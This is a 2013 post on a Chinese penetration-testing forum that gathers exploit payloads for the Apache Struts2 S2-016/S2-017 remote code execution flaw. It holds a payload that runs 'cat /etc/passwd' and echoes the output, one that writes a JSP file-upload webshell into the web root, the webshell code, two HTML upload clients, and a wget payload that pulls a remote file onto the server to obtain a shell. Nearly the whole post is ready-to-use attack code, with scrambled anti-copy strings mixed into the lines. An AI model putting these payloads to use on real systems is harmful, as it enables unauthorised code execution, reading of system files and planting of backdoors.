找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2843|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
" s3 O# k8 ~: r& y: C) n  {$ L1 {* {
喜欢就点一下感谢吧^_^/ s# L* s# I6 Y) K: ^; H- L5 y0 l

+ U( S1 {. b# s' ]5 T带回显命令执行:
' u1 _( `6 P. \' M# @) @
2 P2 R  O. C+ h0 z- _4 o: q8 _4 Shttp://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}. `1 i( D. h3 l6 [% g+ ?' b
) I% b1 c0 i, c2 e; ?# g. D
6 a% q+ Q- U, s. O* e2 z. A3 m& y

. S! ?* R2 l; u% s3 R/ x7 E: f; R% W- z9 n
$ s0 P! m$ y1 X" u, q

% ^6 I" P1 [- w; j: q9 H4 ~  _5 v5 Y
爆路径:  Z) m) O$ F: K+ V- ]

, V/ S  a/ {* e. Z1 S( {+ ihttp://www.example.com/struts2-b ... 8%29.close%28%29%7D
$ e4 ~# U  y- E; R5 I0 f! I* p4 r+ I( z  X) |) l
4 ~% n5 y0 R8 ~/ v$ Z

: U( u& z. U/ y+ T2 {$ G" v" T; ?* F7 X& o

" `- m9 L' v+ K% J" O写文件:6 U# A! ?. s* \1 e& @. b. u

& u7 ^8 _- ?/ R* Xhttp://www.example.com/struts2-blank/example/X.action?redirect:${
9 j. Y" }9 @/ Y/ A  {
+ W6 H, y  T  o%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),3 v9 k" t2 e: \0 ~9 c: {
/ M- a) r% h( ^2 ?
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),) d8 o9 ?3 k0 l  y! F2 {3 m
9 k6 n! y# K! o* f
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
1 ^" y5 n% v9 E
: E" C  r! X3 X}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
6 o2 u* H  }; |& e
$ c3 w+ Z6 f/ C7 n" i, _/ d* u6 g0 f- G) l7 Z

4 h9 H- L8 r3 y2 J) \0 T写入的文件内容:9 Y2 B2 j  G9 g! y
7 I( y0 k% U. I+ e3 l6 t, c* z
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
6 C2 S# x4 M8 N3 Q! X$ \2 d. }( U3 h3 ^7 h" q" i
其实就是一个jsp的小马,需要客户端配合                                                                                  # y4 U! v( y; Z' ~
; f* d0 t: A, V& N
函数f是文件名,t是内容% z5 E9 [, s6 o% \- o

6 ^# E+ d" a: c0 W4 U客户端:
/ r- V' \$ z5 X% r
3 v0 A/ R; E: `7 W<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">- ^. B$ E4 G' D: O+ Q  ]1 b( I

+ G# t' m$ t: x. d% l1 `0 Q- D<textarea name=t cols=120 rows=10 width=45>your code</textarea>
$ M8 m1 H/ f3 I: E( k; G8 V) k1 }+ q6 o4 f5 b& C! V, d& O
<center>
; ]. U1 Y0 }- o5 \4 ^6 x" G& |
, w$ J; D$ G! E7 u  C, R
5 X  G' h/ q. X+ ?1 b7 K+ w
+ I/ y7 k4 i6 a' T<input type=submit value="提交">
! b0 C6 M2 h- s6 q0 D
1 }- Y3 l9 W2 ]7 T9 M/ v' X</form>
+ u' G) A  y' t6 ^. F, U  B  s8 y! S) g% M4 `! J1 l  ?; K: J8 p
就在当前目录建立一个fjp.jsp
  P, d3 w+ t- s) C! q) `+ H
7 ?+ j( |5 M+ Q! T# W5 ?6 P( Bshell:http://www.example.com/struts2-blank/example/fjp.jsp# C) s( B2 N4 F
5 W% B5 F2 R0 S
4 l- S2 ^) c. m1 c. ]7 D

2 E1 F$ y2 l! V1 Y! G/ {还有@园长的一个客户端:
& m- V- G" g, g/ x9 h/ {/ [5 J" @! Z2 c6 {( z8 c" X
<html>* D) |/ r! q7 P) M+ `5 S
2 n% c+ c- m1 }4 F. ~- M3 X
<head>
: y  [9 O: h# d( n3 J* Q3 k, V8 T" F* a' [3 L# U( {: r' K  C+ T
<meta http-equiv="content-type" content="text/html;charset=utf-8">
4 S5 O- |2 c" e  M! d- ~
: b- Y7 s# V* c% a0 j9 R5 O; C  K4 j<title>jsp-园长</title>% b" c" b* `& e, W# v
2 x) G0 x7 T" B$ e4 y% \" H7 g
</head>
" }2 P5 H$ B% Q
  b. t' |: c% H: A% R' `<style>
( ~0 b5 ?7 `+ ^  W
6 w; G$ \4 u2 o: N1 Y.main{width:980px;height:600px;margin:0 auto;}
$ v! t0 b2 z$ a  k8 n% X4 V% O% V* \; \! Q
.url{width:300px;}
5 f# i2 ^/ `7 p, x
3 r% G8 }  t4 l$ I) g; ].fn{width:60px;}
0 F" [5 S  g8 X4 F" B) {. ?2 k# v6 s8 S1 o1 c0 H) D6 J
.content{width:80%;height:60%;}
/ S3 Z% V' x! g% a, U
$ u7 h2 ?9 H+ L. g% W% T4 `8 K</style>- ~! G' F5 u. {" E
* a7 G" D, q% Q: h
<script>
2 @* y2 ?* b( W  G6 X! C! ~2 u4 _- W% V1 }8 S
  function upload(){. q' B4 P* q  s4 Y- W) F( v6 i
$ k# K9 n. t. m
    var url = document.getElementById('url').value,! H# H5 j( E0 R* G6 V6 S

+ N$ p: E7 k" k* _. K, ~+ g      content = document.getElementById('content').value,) t: I" J! }  W- k. x* X3 L2 N0 B/ |
* \$ Q0 N# E3 ~0 P
      fileName = document.getElementById('fn').value,
8 m% B2 a+ Q& z" g2 _( L2 u5 E7 V- Y1 B, Y
      form = document.getElementById('fm');
6 D, O0 J( Y% t0 o6 \6 w
5 I5 n2 r! i; v  g4 c; P; L    if(url.length == 0){
' f2 y( V1 u( G4 r
5 P; h% ~& R/ R9 x      alert("Url not allowd empty!");
7 q2 n, Q6 ?6 V, p9 @  M/ x( P. v, L! D
      return ;
6 w+ t2 u' F0 D- P$ \0 @/ n3 W+ |# b! k% B7 ~
    }
. b2 g! _. w6 G( f3 v5 U( l
2 m7 `2 o. s; j    if(content.length == 0){
- U& M) K* l* Y" c2 c
% I- l) C# f0 K4 q0 _3 |      alert("Content not allowd empty!");1 J5 R+ Y. T# L, z0 R( ]
" Q' p7 k0 z) }+ E
      return ;) d' k: _& {3 O, c! m' }
: Y  e' n3 N' ]3 V* i
    }4 p6 M" P, u) H

0 u; Q; C4 J2 q5 y; n* _    if(fileName.length == 0){
8 p6 r6 i" l' M9 g% ^9 P) o
& I2 X7 O1 v' f' K: y* z      alert("FileName not allowd empty!");
+ a+ t5 F6 E$ o7 d$ ~+ A* _/ o5 Y4 _0 N0 R9 X% z0 h
      return ;3 r5 x% H. y+ K" h
; w" P. R& s( T2 U2 }. Q/ a: H
    }: ^/ S% @- G* |! D+ p
6 v. d/ S. U0 e
    form.action = url;
) A$ L$ v) S& Y
  l/ t* c4 J: u! B' Q    form.submit();6 {4 H9 G/ ^' d0 e4 o& \' x) W; ^

4 F1 R$ Q& x) b; G& a9 F- ^/ Y0 P. l  }
) u& B" [1 M. y4 i1 x4 w8 A' c/ j& P! E2 h2 L
</script>
* D% E( c3 c% A5 T  h' V5 |: n3 S* o7 k, Y4 C6 z. s
<body>& Q; n) U2 x) O7 f3 s
7 ]1 M5 U, z5 z& k
<div class="main">
+ Y/ \7 i" B$ m6 D0 @
: z3 f  t$ f6 X' d" b$ y  <form id="fm" method="post">  3 F( U  z( [8 b6 I

( R0 p+ F: W) }' o9 {    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  " n/ Z$ ^$ j& Y6 o5 q+ n* [

9 s0 [- a8 V3 F# P9 n9 P7 a. t    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  6 U: ]9 \# U$ G
; {- W, V( O* P/ T2 w7 p/ r
    <a href="javascript:upload();">Upload</a>% \3 F2 K2 _/ D

) Z- n( G) w. _6 Y1 C
6 J0 i3 Y9 Z7 V# `
# ?  T8 f) u) f7 i, F/ {    <textarea id="content" class="content" name="t" ></textarea>
! D2 }  D) A7 e$ z: o% |( r/ c
: H) J& _2 S/ v  r% l7 X3 g; t  Z  </form>
6 L( c6 @4 W, t* W5 K% d: b" s7 G! r* E+ I: n. z8 I; q3 w
</div>% R! y: r. {& a# e0 J3 l

  K0 Q5 q9 _; X- e</body>6 O5 I. |0 ^, R+ X

3 ]6 j- u0 M4 I% w  c</html>
& D# Q$ x; l! I! Q5 y1 A( M: v7 v/ X5 }0 e9 y

# _3 p6 e* [+ c0 Z/ W8 f* M$ i/ m1 f+ b5 r. Q* |3 g
还有@X发的一个wget的getshell, p7 Z2 `& C2 `* q: e# S3 v2 L0 D: D% w
4 X& P4 w7 G$ W& h' g/ r
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}: O$ C5 K1 p1 ?5 R$ t" j

% Q* E7 L. n) _$ g' l& @)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}% |6 ^0 Q5 G+ C
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表